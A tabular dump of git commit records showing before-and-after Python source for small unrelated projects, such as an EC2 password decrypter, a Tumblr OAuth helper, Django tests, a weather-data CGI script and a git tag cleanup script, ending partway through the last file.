commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
18d66a1325e9c8825c4b33ea5438fe0ec8fcab33 | Don't swallow the underlying decrypt error | decrypt-windows-ec2-passwd.py | decrypt-windows-ec2-passwd.py | #!/usr/bin/env python
import base64, binascii, getpass, optparse, sys
from Crypto.PublicKey import RSA
def pkcs1_unpad(text):
#From http://kfalck.net/2011/03/07/decoding-pkcs1-padding-in-python
if len(text) > 0 and text[0] == '\x02':
# Find end of padding marked by nul
pos = text.find('\x00')
if pos > 0:
return text[pos+1:]
return None
def long_to_bytes (val, endianness='big'):
# From http://stackoverflow.com/questions/8730927/convert-python-long-int-to-fixed-size-byte-array
# one (1) hex digit per four (4) bits
try:
#Python < 2.7 doesn't have bit_length =(
width = val.bit_length()
except:
width = len(val.__hex__()[2:-1]) * 4
# unhexlify wants an even multiple of eight (8) bits, but we don't
# want more digits than we need (hence the ternary-ish 'or')
width += 8 - ((width % 8) or 8)
# format width specifier: four (4) bits per hex digit
fmt = '%%0%dx' % (width // 4)
# prepend zero (0) to the width, to zero-pad the output
s = binascii.unhexlify(fmt % val)
if endianness == 'little':
# see http://stackoverflow.com/a/931095/309233
s = s[::-1]
return s
def decryptPassword(rsaKey, password):
#Undo the whatever-they-do to the ciphertext to get the integer
encryptedData = base64.b64decode(password)
ciphertext = int(binascii.hexlify(encryptedData), 16)
#Decrypt it
plaintext = rsaKey.decrypt(ciphertext)
#This is the annoying part. long -> byte array
decryptedData = long_to_bytes(plaintext)
#Now Unpad it
unpaddedData = pkcs1_unpad(decryptedData)
#Done
return unpaddedData
if __name__ == "__main__":
parser = optparse.OptionParser()
parser.add_option("-k", "--key", dest="keyfile", default="~/.ssh/id_rsa", help="location of your ssh private key")
parser.add_option("-p", "--password", dest="password", help="encrypted password")
(options, args) = parser.parse_args()
if not options.keyfile or not options.password:
parser.print_help()
sys.exit(-1)
#Open your keyfile
try:
keyFile = open(options.keyfile)
except:
print "Could not find file", options.keyfile
sys.exit(-1)
#Read file
keyLines = keyFile.readlines()
#Import it
try:
key = RSA.importKey(keyLines, passphrase=getpass.getpass('Encrypted Key Password (leave blank if none): '))
except ValueError, ex:
print "Could not import SSH Key (Is it an RSA key? Is it password protected?): %s" % ex
sys.exit(-1)
#Decrypt it
print ""
print "Password:", decryptPassword(key, options.password)
| #!/usr/bin/env python
import base64, binascii, getpass, optparse, sys
from Crypto.PublicKey import RSA
def pkcs1_unpad(text):
#From http://kfalck.net/2011/03/07/decoding-pkcs1-padding-in-python
if len(text) > 0 and text[0] == '\x02':
# Find end of padding marked by nul
pos = text.find('\x00')
if pos > 0:
return text[pos+1:]
return None
def long_to_bytes (val, endianness='big'):
# From http://stackoverflow.com/questions/8730927/convert-python-long-int-to-fixed-size-byte-array
# one (1) hex digit per four (4) bits
try:
#Python < 2.7 doesn't have bit_length =(
width = val.bit_length()
except:
width = len(val.__hex__()[2:-1]) * 4
# unhexlify wants an even multiple of eight (8) bits, but we don't
# want more digits than we need (hence the ternary-ish 'or')
width += 8 - ((width % 8) or 8)
# format width specifier: four (4) bits per hex digit
fmt = '%%0%dx' % (width // 4)
# prepend zero (0) to the width, to zero-pad the output
s = binascii.unhexlify(fmt % val)
if endianness == 'little':
# see http://stackoverflow.com/a/931095/309233
s = s[::-1]
return s
def decryptPassword(rsaKey, password):
#Undo the whatever-they-do to the ciphertext to get the integer
encryptedData = base64.b64decode(password)
ciphertext = int(binascii.hexlify(encryptedData), 16)
#Decrypt it
plaintext = rsaKey.decrypt(ciphertext)
#This is the annoying part. long -> byte array
decryptedData = long_to_bytes(plaintext)
#Now Unpad it
unpaddedData = pkcs1_unpad(decryptedData)
#Done
return unpaddedData
if __name__ == "__main__":
parser = optparse.OptionParser()
parser.add_option("-k", "--key", dest="keyfile", default="~/.ssh/id_rsa", help="location of your ssh private key")
parser.add_option("-p", "--password", dest="password", help="encrypted password")
(options, args) = parser.parse_args()
if not options.keyfile or not options.password:
parser.print_help()
sys.exit(-1)
#Open your keyfile
try:
keyFile = open(options.keyfile)
except:
print "Could not find file", options.keyfile
sys.exit(-1)
#Read file
keyLines = keyFile.readlines()
#Import it
try:
key = RSA.importKey(keyLines, passphrase=getpass.getpass('Encrypted Key Password (leave blank if none): '))
except ValueError:
print "Could not import SSH Key (Is it an RSA key? Is it password protected?)"
sys.exit(-1)
#Decrypt it
print ""
print "Password:", decryptPassword(key, options.password)
| Python | 0.998796 |
57cb5546d0e832bae8b2171d42fc4428ebc6dc74 | add try for imports | tumb_borg/authorize.py | tumb_borg/authorize.py | #!/usr/bin/python
from tumblpy import Tumblpy as T
try:
from urllib.parse import urlparse, parse_qs
except ImportError:
from urlparse import urlparse, parse_qs
def authorize(KEY, SECRET, CALLBACK):
def get_authorization_properties():
t = T(KEY, SECRET)
return t \
.get_authentication_tokens(
callback_url=CALLBACK)
auth_p = get_authorization_properties()
def get_auth_url():
print('Please connect with Tumblr via: \n%s' \
% auth_p['auth_url'])
result_url = \
raw_input("Copy and paste the accepting url: ")
return result_url
def query_string(url):
return { k: v[0] for k, v in
parse_qs(urlparse(url).query).items() }
def query_string_auth():
return query_string(get_auth_url())
def authorized_tokens():
q = query_string_auth()
t = T(KEY, SECRET,
q['oauth_token'],
auth_p['oauth_token_secret'])
return t.get_authorized_tokens(q['oauth_verifier'])
def authorized_t():
a = authorized_tokens()
return T(KEY, SECRET,
a['oauth_token'],
a['oauth_token_secret'])
return authorized_t()
| #!/usr/bin/python
from tumblpy import Tumblpy as T
from urlparse import urlparse, parse_qs
def authorize(KEY, SECRET, CALLBACK):
def get_authorization_properties():
t = T(KEY, SECRET)
return t \
.get_authentication_tokens(
callback_url=CALLBACK)
auth_p = get_authorization_properties()
def get_auth_url():
print('Please connect with Tumblr via: \n%s' \
% auth_p['auth_url'])
result_url = \
raw_input("Copy and paste the accepting url: ")
return result_url
def query_string(url):
return { k: v[0] for k, v in
parse_qs(urlparse(url).query).items() }
def query_string_auth():
return query_string(get_auth_url())
def authorized_tokens():
q = query_string_auth()
t = T(KEY, SECRET,
q['oauth_token'],
auth_p['oauth_token_secret'])
return t.get_authorized_tokens(q['oauth_verifier'])
def authorized_t():
a = authorized_tokens()
return T(KEY, SECRET,
a['oauth_token'],
a['oauth_token_secret'])
return authorized_t()
| Python | 0 |
e5fd6111d164cee574cb929849934e0b2c7a70a1 | Add ArticleImportView tests | molo/core/api/tests/test_views.py | molo/core/api/tests/test_views.py | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
from mock import patch
from molo.core.api.tests.utils import mocked_requests_get
from molo.core.tests.base import MoloTestCaseMixin
class MainImportViewTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_raises_error_if_data_not_available(self):
form_data = {
"url": "http://localhost:8000/api/v2/pages/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertFormError(
response, "form", "url", [u"Please enter a valid URL."]
)
@patch("molo.core.api.forms.requests.get", side_effect=mocked_requests_get)
def test_redirects_to_parent_chooser(self, mock_get):
form_data = {
"url": "http://localhost:8000/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertContains(response, "Add Article")
class ArticleParentChooserTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_redirects_to_first_page_if_session_not_set(self):
response = self.client.get(reverse("molo_api:article-parent-chooser"))
self.assertEqual(
response["Location"],
reverse("molo_api:main-import")
)
class ArticleImportViewTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_redirects_to_main_page_if_session_not_set(self):
response = self.client.get(reverse("molo_api:article-import"))
self.assertEqual(
response["Location"],
reverse("molo_api:main-import")
)
def test_articles_can_be_imported(self):
pass | from django.contrib.auth.models import User
from django.test import Client, TestCase
from django.core.urlresolvers import reverse
from mock import patch
from molo.core.api.tests.utils import mocked_requests_get
from molo.core.tests.base import MoloTestCaseMixin
class MainImportViewTestCase(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_raises_error_if_data_not_available(self):
form_data = {
"url": "http://localhost:8000/api/v2/pages/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertFormError(
response, "form", "url", [u"Please enter a valid URL."]
)
@patch("molo.core.api.forms.requests.get", side_effect=mocked_requests_get)
def test_redirects_to_parent_chooser(self, mock_get):
form_data = {
"url": "http://localhost:8000/",
"content_type": "core.ArticlePage"
}
response = self.client.post(
reverse("molo_api:main-import"),
data=form_data,
follow=True
)
self.assertContains(response, "Add Article")
class ArticleParentChooserView(MoloTestCaseMixin, TestCase):
def setUp(self):
self.mk_main()
self.client = Client()
User.objects.create_superuser(
username="admin", email="admin@admin.com", password="admin"
)
self.client.login(username="admin", password="admin")
def test_redirects_to_first_page_if_session_not_set(self):
response = self.client.get(reverse("molo_api:article-parent-chooser"))
self.assertEqual(
response["Location"],
reverse("molo_api:main-import")
)
def test_redirects_to_article_import(self):
pass
| Python | 0 |
3a49982dfe1a94159bb2543540ae3638688c7c31 | make RAOB download backend more time forgiving | cgi-bin/request/raob.py | cgi-bin/request/raob.py | #!/usr/bin/env python
"""
Download interface for data from RAOB network
"""
import sys
import cgi
import datetime
import pytz
from pyiem.util import get_dbconn, ssw
from pyiem.network import Table as NetworkTable
def m(val):
"""Helper"""
if val is None:
return 'M'
return val
def fetcher(station, sts, ets):
"""Do fetching"""
dbconn = get_dbconn('postgis')
cursor = dbconn.cursor('raobstreamer')
stations = [station, ]
if station.startswith("_"):
nt = NetworkTable("RAOB")
stations = nt.sts[station]['name'].split("--")[1].strip().split(",")
cursor.execute("""
SELECT f.valid at time zone 'UTC', p.levelcode, p.pressure, p.height,
p.tmpc, p.dwpc, p.drct, round((p.smps * 1.94384)::numeric,0),
p.bearing, p.range_miles, f.station from
raob_profile p JOIN raob_flights f on
(f.fid = p.fid) WHERE f.station in %s and valid >= %s and valid < %s
""", (tuple(stations), sts, ets))
ssw(("station,validUTC,levelcode,pressure_mb,height_m,tmpc,"
"dwpc,drct,speed_kts,bearing,range_sm\n"))
for row in cursor:
ssw(("%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n"
) % (row[10], m(row[0]),
m(row[1]), m(row[2]), m(row[3]), m(row[4]),
m(row[5]), m(row[6]), m(row[7]),
m(row[8]), m(row[9])))
def friendly_date(form, key):
"""More forgiving date conversion"""
val = form.getfirst(key)
try:
val = val.strip()
if len(val.split()) == 1:
dt = datetime.datetime.strptime(val, '%m/%d/%Y')
else:
dt = datetime.datetime.strptime(val, '%m/%d/%Y %H:%M')
dt = dt.replace(tzinfo=pytz.UTC)
except Exception as _exp:
ssw('Content-type: text/plain\n\n')
ssw(('Invalid %s date provided, should be "%%m/%%d/%%Y %%H:%%M"'
' in UTC timezone'
) % (key, ))
sys.exit()
return dt
def main():
"""Go Main Go"""
form = cgi.FieldStorage()
sts = friendly_date(form, 'sts')
ets = friendly_date(form, 'ets')
station = form.getfirst('station', 'KOAX')[:4]
if form.getfirst('dl', None) is not None:
ssw('Content-type: application/octet-stream\n')
ssw(("Content-Disposition: attachment; filename=%s_%s_%s.txt\n\n"
) % (station, sts.strftime("%Y%m%d%H"),
ets.strftime("%Y%m%d%H")))
else:
ssw('Content-type: text/plain\n\n')
fetcher(station, sts, ets)
if __name__ == '__main__':
main()
| #!/usr/bin/env python
"""
Download interface for data from RAOB network
"""
import cgi
import datetime
import pytz
from pyiem.util import get_dbconn, ssw
from pyiem.network import Table as NetworkTable
def m(val):
"""Helper"""
if val is None:
return 'M'
return val
def fetcher(station, sts, ets):
"""Do fetching"""
dbconn = get_dbconn('postgis')
cursor = dbconn.cursor()
stations = [station, ]
if station.startswith("_"):
nt = NetworkTable("RAOB")
stations = nt.sts[station]['name'].split("--")[1].strip().split(",")
cursor.execute("""
SELECT f.valid at time zone 'UTC', p.levelcode, p.pressure, p.height,
p.tmpc, p.dwpc, p.drct, round((p.smps * 1.94384)::numeric,0),
p.bearing, p.range_miles, f.station from
raob_profile p JOIN raob_flights f on
(f.fid = p.fid) WHERE f.station in %s and valid >= %s and valid < %s
""", (tuple(stations), sts, ets))
ssw(("station,validUTC,levelcode,pressure_mb,height_m,tmpc,"
"dwpc,drct,speed_kts,bearing,range_sm\n"))
for row in cursor:
ssw(("%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s\n"
) % (row[10], m(row[0]),
m(row[1]), m(row[2]), m(row[3]), m(row[4]),
m(row[5]), m(row[6]), m(row[7]),
m(row[8]), m(row[9])))
def main():
"""Go Main Go"""
form = cgi.FieldStorage()
sts = datetime.datetime.strptime(form.getfirst('sts', ''),
'%m/%d/%Y %H:%M')
sts = sts.replace(tzinfo=pytz.utc)
ets = datetime.datetime.strptime(form.getfirst('ets', ''),
'%m/%d/%Y %H:%M')
ets = ets.replace(tzinfo=pytz.utc)
station = form.getfirst('station', 'KOAX')[:4]
if form.getfirst('dl', None) is not None:
ssw('Content-type: application/octet-stream\n')
ssw(("Content-Disposition: attachment; filename=%s_%s_%s.txt\n\n"
) % (station, sts.strftime("%Y%m%d%H"),
ets.strftime("%Y%m%d%H")))
else:
ssw('Content-type: text/plain\n\n')
fetcher(station, sts, ets)
if __name__ == '__main__':
main()
| Python | 0 |
722de274d3ee9866c7580a7f95e32de1777e6a3b | Add note | csscms/properties_scraper.py | csscms/properties_scraper.py | from pyquery import PyQuery as pq
"""
A quick and dirty scraper for w3c's css properties list.
See css_properties.py for the example output. This is meant to be run once, except when new properties
need to be scraped.
"""
def strip_all_prefixes(string):
bad_prefixes = [
'text-text-',
'pos-',
'font-font-',
'nav-',
'class-',
'gen-',
'tab-'
]
for prefix in bad_prefixes:
string = string.replace(prefix, '')
return string
def normalize_w3c_link(url):
url = strip_all_prefixes(url)
return '-'.join(url.replace(
'.asp', '').replace('css3_pr_', '').replace('pr_', '').split('_'))
def load_all_w3c_props(root_url, max_open=None):
table_class = '.reference.notranslate'
data = {}
urls = []
doc = pq(url=root_url)
links = pq(doc).find(table_class).find('a')
def _process(_, selector):
if selector is not None:
prop = pq(selector).find('td').eq(0).text().strip()
if len(prop) > 0:
return urls.append(prop)
else:
return ''
for k, link in enumerate(links):
if max_open is not None:
if k >= max_open:
break
url = pq(link).attr('href')
follow_doc = pq(url='{}/{}'.format(root_url, url))
pq(follow_doc).find(table_class).find('tr').each(_process)
# Normalize property from w3c's url structure
url = normalize_w3c_link(url)
# Push all current options
data[url] = {'dropdown': True, 'props': urls}
# Mutable container, empty it out for reuse
urls = []
return data
print(load_all_w3c_props('http://www.w3schools.com/cssref/'))
| from pyquery import PyQuery as pq
"""A quick and dirty scraper for w3c's css properties list."""
def strip_all_prefixes(string):
bad_prefixes = [
'text-text-',
'pos-',
'font-font-',
'nav-',
'class-',
'gen-',
'tab-'
]
for prefix in bad_prefixes:
string = string.replace(prefix, '')
return string
def normalize_w3c_link(url):
url = strip_all_prefixes(url)
return '-'.join(url.replace(
'.asp', '').replace('css3_pr_', '').replace('pr_', '').split('_'))
def load_all_w3c_props(root_url, max_open=None):
table_class = '.reference.notranslate'
data = {}
urls = []
doc = pq(url=root_url)
links = pq(doc).find(table_class).find('a')
def _process(_, selector):
if selector is not None:
prop = pq(selector).find('td').eq(0).text().strip()
if len(prop) > 0:
return urls.append(prop)
else:
return ''
for k, link in enumerate(links):
if max_open is not None:
if k >= max_open:
break
url = pq(link).attr('href')
follow_doc = pq(url='{}/{}'.format(root_url, url))
pq(follow_doc).find(table_class).find('tr').each(_process)
# Normalize property from w3c's url structure
url = normalize_w3c_link(url)
# Push all current options
data[url] = {'dropdown': True, 'props': urls}
# Mutable container, empty it out for reuse
urls = []
return data
print(load_all_w3c_props('http://www.w3schools.com/cssref/'))
| Python | 0 |
d13204abb2cf5d341eff78416dd442c303042697 | Modify add_occupant method to raise exception in case of a duplicate | classes/room.py | classes/room.py | class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if person not in self.persons:
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
else:
raise Exception(person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " is already among the occupants in " + self.room_type + " " + self.room_name.title())
| class Room(object):
def __init__(self, room_name, room_type, max_persons):
self.room_name = room_name
self.room_type = room_type
self.max_persons = max_persons
self.persons = []
def add_occupant(self, person):
if len(self.persons) < self.max_persons:
self.persons.append(person)
print (person.person_type.title() + " " + person.person_name.title() + " " + person.person_surname.title() + " has been allocated " + self.room_type + " " + self.room_name.title())
else:
raise Exception(self.room_type.title() + " " + self.room_name.title() + " is at full capacity")
| Python | 0 |
90d3f00cd8fea8fab9274069ac06ea461f8e4dfd | Send only pics and gifs to OOO_B_R. | channels/ooo_b_r/app.py | channels/ooo_b_r/app.py | #encoding:utf-8
from utils import get_url, weighted_random_subreddit
# Group chat https://yal.sh/dvdahoy
t_channel = '-1001065558871'
subreddit = weighted_random_subreddit({
'ANormalDayInRussia': 1.0,
'ANormalDayInAmerica': 0.1,
'ANormalDayInJapan': 0.01
})
def send_post(submission, r2t):
what, url, ext = get_url(submission)
title = submission.title
link = submission.shortlink
text = '{}\n{}'.format(title, link)
return r2t.send_gif_img(what, url, ext, text)
| #encoding:utf-8
from utils import get_url, weighted_random_subreddit
# Group chat https://yal.sh/dvdahoy
t_channel = '-1001065558871'
subreddit = weighted_random_subreddit({
'ANormalDayInRussia': 1.0,
'ANormalDayInAmerica': 0.1,
'ANormalDayInJapan': 0.01
})
def send_post(submission, r2t):
what, url, ext = get_url(submission)
title = submission.title
link = submission.shortlink
text = '{}\n{}'.format(title, link)
if what == 'text':
return False
elif what == 'other':
return False
elif what == 'album':
r2t.send_album(url)
return True
elif what in ('gif', 'img'):
return r2t.send_gif_img(what, url, ext, text)
else:
return False
| Python | 0 |
e309ed0a2f1f991e4015fcede373dccfe3843d97 | Change version tag. | core/info/info.py | core/info/info.py | # -*- coding: utf-8 -*-
"""Informations.
+ Pyslvs version.
+ Module versions.
+ Help descriptions.
+ Check for update function.
"""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2018"
__license__ = "AGPL"
__email__ = "pyslvs@gmail.com"
from sys import version_info
import platform
import argparse
import requests
from core.QtModules import (
QProgressDialog,
qVersion,
PYQT_VERSION_STR
)
Qt_Version = qVersion().strip()
PyQt_Version = PYQT_VERSION_STR.strip()
VERSION = (18, 3, 0, 'release')
INFO = (
"Pyslvs {}.{}.{}({})".format(*VERSION),
"OS Type: {} {} [{}]".format(platform.system(), platform.release(), platform.machine()),
"Python Version: {v.major}.{v.minor}.{v.micro}({v.releaselevel})".format(v=version_info),
"Python Compiler: {}".format(platform.python_compiler()),
"Qt Version: {}".format(Qt_Version),
"PyQt Version: {}".format(PyQt_Version)
)
POWERBY = (
"Python IDE Eric 6",
"PyQt 5",
"dxfwrite",
"Cython",
"PyZMQ",
"openpyxl",
"psutil",
"peewee",
"Lark-parser",
"NetworkX",
"Pydot"
)
"""--help arguments"""
parser = argparse.ArgumentParser(
description="Pyslvs - Open Source Planar Linkage Mechanism Simulation and Mechanical Synthesis System. ",
epilog="Power by {}.".format(", ".join(POWERBY))
)
parser.add_argument('-v', '--version', action='version', help="show version infomations and exit", version=INFO[0])
parser.add_argument('r', metavar='FILE PATH', default=False, nargs='?', type=str, help="read workbook from the file path")
parser.add_argument('-i', metavar='START PATH', default=False, nargs='?', type=str, help="start Pyslvs in the specified path")
parser.add_argument('-w', action='store_true', help="show rebuild warning of canvas")
parser.add_argument('-f', '--fusion', action='store_true', help="run Pyslvs in Fusion style")
parser.add_argument('--full-screen', action='store_true', help="start Pyslvs with full-screen mode")
parser.add_argument('--server', metavar='PORT', default=False, nargs='?', type=str, help="start ZMQ server")
parser.add_argument('-d', '--debug-mode', action='store_true', help="do not connect to GUI console when opening")
parser.add_argument('-t', '--test', action='store_true', help="startup the program to test imported modules")
ARGUMENTS = parser.parse_args()
def check_update(progdlg: QProgressDialog) -> [str, bool]:
"""Check for update."""
m = progdlg.maximum()
from core.QtModules import QCoreApplication
for i in range(m):
QCoreApplication.processEvents()
if progdlg.wasCanceled():
return
next = list(VERSION[:m])
next[i] += 1
url = "https://github.com/KmolYuan/Pyslvs-PyQt5/releases/tag/v{}.{:02}.{}".format(*next)
request = requests.get(url)
progdlg.setValue(i + 1)
if request.status_code == 200:
progdlg.setValue(m)
return url
return False
| # -*- coding: utf-8 -*-
"""Informations.
+ Pyslvs version.
+ Module versions.
+ Help descriptions.
+ Check for update function.
"""
__author__ = "Yuan Chang"
__copyright__ = "Copyright (C) 2016-2018"
__license__ = "AGPL"
__email__ = "pyslvs@gmail.com"
from sys import version_info
import platform
import argparse
import requests
from core.QtModules import (
QProgressDialog,
qVersion,
PYQT_VERSION_STR
)
Qt_Version = qVersion().strip()
PyQt_Version = PYQT_VERSION_STR.strip()
VERSION = (18, 3, 0, 'dev')
INFO = (
"Pyslvs {}.{}.{}({})".format(*VERSION),
"OS Type: {} {} [{}]".format(platform.system(), platform.release(), platform.machine()),
"Python Version: {v.major}.{v.minor}.{v.micro}({v.releaselevel})".format(v=version_info),
"Python Compiler: {}".format(platform.python_compiler()),
"Qt Version: {}".format(Qt_Version),
"PyQt Version: {}".format(PyQt_Version)
)
POWERBY = (
"Python IDE Eric 6",
"PyQt 5",
"dxfwrite",
"Cython",
"PyZMQ",
"openpyxl",
"psutil",
"peewee",
"Lark-parser",
"NetworkX",
"Pydot"
)
"""--help arguments"""
parser = argparse.ArgumentParser(
description="Pyslvs - Open Source Planar Linkage Mechanism Simulation and Mechanical Synthesis System. ",
epilog="Power by {}.".format(", ".join(POWERBY))
)
parser.add_argument('-v', '--version', action='version', help="show version infomations and exit", version=INFO[0])
parser.add_argument('r', metavar='FILE PATH', default=False, nargs='?', type=str, help="read workbook from the file path")
parser.add_argument('-i', metavar='START PATH', default=False, nargs='?', type=str, help="start Pyslvs in the specified path")
parser.add_argument('-w', action='store_true', help="show rebuild warning of canvas")
parser.add_argument('-f', '--fusion', action='store_true', help="run Pyslvs in Fusion style")
parser.add_argument('--full-screen', action='store_true', help="start Pyslvs with full-screen mode")
parser.add_argument('--server', metavar='PORT', default=False, nargs='?', type=str, help="start ZMQ server")
parser.add_argument('-d', '--debug-mode', action='store_true', help="do not connect to GUI console when opening")
parser.add_argument('-t', '--test', action='store_true', help="startup the program to test imported modules")
ARGUMENTS = parser.parse_args()
def check_update(progdlg: QProgressDialog) -> [str, bool]:
"""Check for update."""
m = progdlg.maximum()
from core.QtModules import QCoreApplication
for i in range(m):
QCoreApplication.processEvents()
if progdlg.wasCanceled():
return
next = list(VERSION[:m])
next[i] += 1
url = "https://github.com/KmolYuan/Pyslvs-PyQt5/releases/tag/v{}.{:02}.{}".format(*next)
request = requests.get(url)
progdlg.setValue(i + 1)
if request.status_code == 200:
progdlg.setValue(m)
return url
return False
| Python | 0 |
35d2a174d671e29e08ad512f9bee08e150d39984 | Save original, then parse amounts. | db/db.py | db/db.py | #!/usr/bin/python
import sys
import copy
import json
import getpass
import aesjsonfile
sys.path.append("../")
import config
def parse_amount(amount):
if type(amount) == int:
return amount
if "." not in amount:
amount += ".00"
return int(amount.replace("$","").replace(",","").replace(".",""))
class DB(object):
def __init__(self, username, password):
self.username = username
self.password = password
self.db = aesjsonfile.load("%s/%s.json"%(config.dbdir, self.username), self.password)
self.db.setdefault("transactions",[])
self.db.setdefault("balances",{})
self.db.setdefault("accounts",[])
def save(self):
aesjsonfile.dump("%s/%s.json"%(config.dbdir, self.username), self.db, self.password)
def accountstodo(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
trans = self.search({"account":acct["name"]},limit=5)
acct["seenids"] = [x["id"] for x in trans]
if trans:
acct["lastcheck"] = trans[0]["date"]
return ret
def accounts(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
acct.pop("password",None)
acct["subaccounts"] = []
for sub in self.db["balances"].get(acct["name"],{}):
acct["subaccounts"].append({"name": sub, "amount": self.db["balances"][acct["name"]][sub][0]["amount"],
"date": self.db["balances"][acct["name"]][sub][0]["lastdate"]})
return ret
def search(self, query={}, startdate="0", enddate = "9999", limit=100):
ret = []
for trans in self.db["transactions"]:
if trans["date"] < startdate or trans["date"] > enddate:
continue
if type(query) in [ str, unicode ]:
if query not in json.dumps(trans.values()):
continue
elif query and type(query) == dict:
for k in query:
if not trans.get(k) or query[k] not in trans[k]:
continue
ret.append(trans)
if len(trans) >= limit:
break
return ret
def getallids(self):
return [x["id"] for x in self.db["transactions"]]
def newtransactions(self, data):
for trans in data.get("transactions",[]):
if trans["id"] not in self.getallids():
for k,v in trans.iteritems():
trans["orig_"+k] = v
trans["orig_amount_str"] = trans["amount"]
trans["amount"] = parse_amount(trans["amount"])
self.db["transactions"].append(trans)
self.db["transactions"].sort(cmp=lambda x,y: cmp(x["date"],y["date"]) or cmp(x["id"],y["id"]), reverse=True)
for bal in data.get("balances",[]):
amount = parse_amount(bal["balance"])
oldbal = self.db["balances"].setdefault(bal["account"],{}).setdefault(bal["subaccount"],[])
if oldbal and oldbal[0]["amount"] == amount:
oldbal[0]["lastdate"] = bal["date"]
else:
oldbal.insert(0, {"amount": amount, "firstdate": bal["date"], "lastdate": bal["date"]})
self.save()
return True
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit(1)
password = getpass.getpass()
db = DB(sys.argv[1],password)
print "accountstodo"
print json.dumps(db.accountstodo(), indent=2)
print "accounts"
print json.dumps(db.accounts(), indent=2)
print json.dumps(db.search(limit=10), indent=2)
| #!/usr/bin/python
import sys
import copy
import json
import getpass
import aesjsonfile
sys.path.append("../")
import config
def parse_amount(amount):
if type(amount) == int:
return amount
if "." not in amount:
amount += ".00"
return int(amount.replace("$","").replace(",","").replace(".",""))
class DB(object):
def __init__(self, username, password):
self.username = username
self.password = password
self.db = aesjsonfile.load("%s/%s.json"%(config.dbdir, self.username), self.password)
self.db.setdefault("transactions",[])
self.db.setdefault("balances",{})
self.db.setdefault("accounts",[])
def save(self):
aesjsonfile.dump("%s/%s.json"%(config.dbdir, self.username), self.db, self.password)
def accountstodo(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
trans = self.search({"account":acct["name"]},limit=5)
acct["seenids"] = [x["id"] for x in trans]
if trans:
acct["lastcheck"] = trans[0]["date"]
return ret
def accounts(self):
ret = copy.deepcopy(self.db["accounts"])
for acct in ret:
acct.pop("password",None)
acct["subaccounts"] = []
for sub in self.db["balances"].get(acct["name"],{}):
acct["subaccounts"].append({"name": sub, "amount": self.db["balances"][acct["name"]][sub][0]["amount"],
"date": self.db["balances"][acct["name"]][sub][0]["lastdate"]})
return ret
def search(self, query={}, startdate="0", enddate = "9999", limit=100):
ret = []
for trans in self.db["transactions"]:
if trans["date"] < startdate or trans["date"] > enddate:
continue
if type(query) in [ str, unicode ]:
if query not in json.dumps(trans.values()):
continue
elif query and type(query) == dict:
for k in query:
if not trans.get(k) or query[k] not in trans[k]:
continue
ret.append(trans)
if len(trans) >= limit:
break
return ret
def getallids(self):
return [x["id"] for x in self.db["transactions"]]
def newtransactions(self, data):
for trans in data.get("transactions",[]):
if trans["id"] not in self.getallids():
for k,v in trans.iteritems():
trans["orig_"+k] = v
self.db["transactions"].append(trans)
self.db["transactions"].sort(cmp=lambda x,y: cmp(x["date"],y["date"]) or cmp(x["id"],y["id"]), reverse=True)
for bal in data.get("balances",[]):
amount = parse_amount(bal["balance"])
oldbal = self.db["balances"].setdefault(bal["account"],{}).setdefault(bal["subaccount"],[])
if oldbal and oldbal[0]["amount"] == amount:
oldbal[0]["lastdate"] = bal["date"]
else:
oldbal.insert(0, {"amount": amount, "firstdate": bal["date"], "lastdate": bal["date"]})
self.save()
return True
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit(1)
password = getpass.getpass()
db = DB(sys.argv[1],password)
print "accountstodo"
print json.dumps(db.accountstodo(), indent=2)
print "accounts"
print json.dumps(db.accounts(), indent=2)
print json.dumps(db.search(limit=10), indent=2)
| Python | 0 |
d966b0973da71f5c883697ddd12c2728b2a04cce | Improve git tag to version conversion | ci/cleanup-binary-tags.py | ci/cleanup-binary-tags.py | #!/usr/bin/env python3
import os
import subprocess
import re
import semver
def tag_to_version(tag):
    """Extract the semver part of a tag shaped like 'binary-<version>-<target>'."""
    parts = tag.split('-')
    return parts[1].lstrip('v')
# Keep only the three newest binary-release tag versions; delete the rest
# both locally and on the remote.
subprocess.check_call('git pull --tags', shell=True)
tags = subprocess.check_output(
    'git tag --list | grep binary', shell=True).decode('UTF-8').splitlines()
# Unique versions, sorted oldest-to-newest by semantic version.
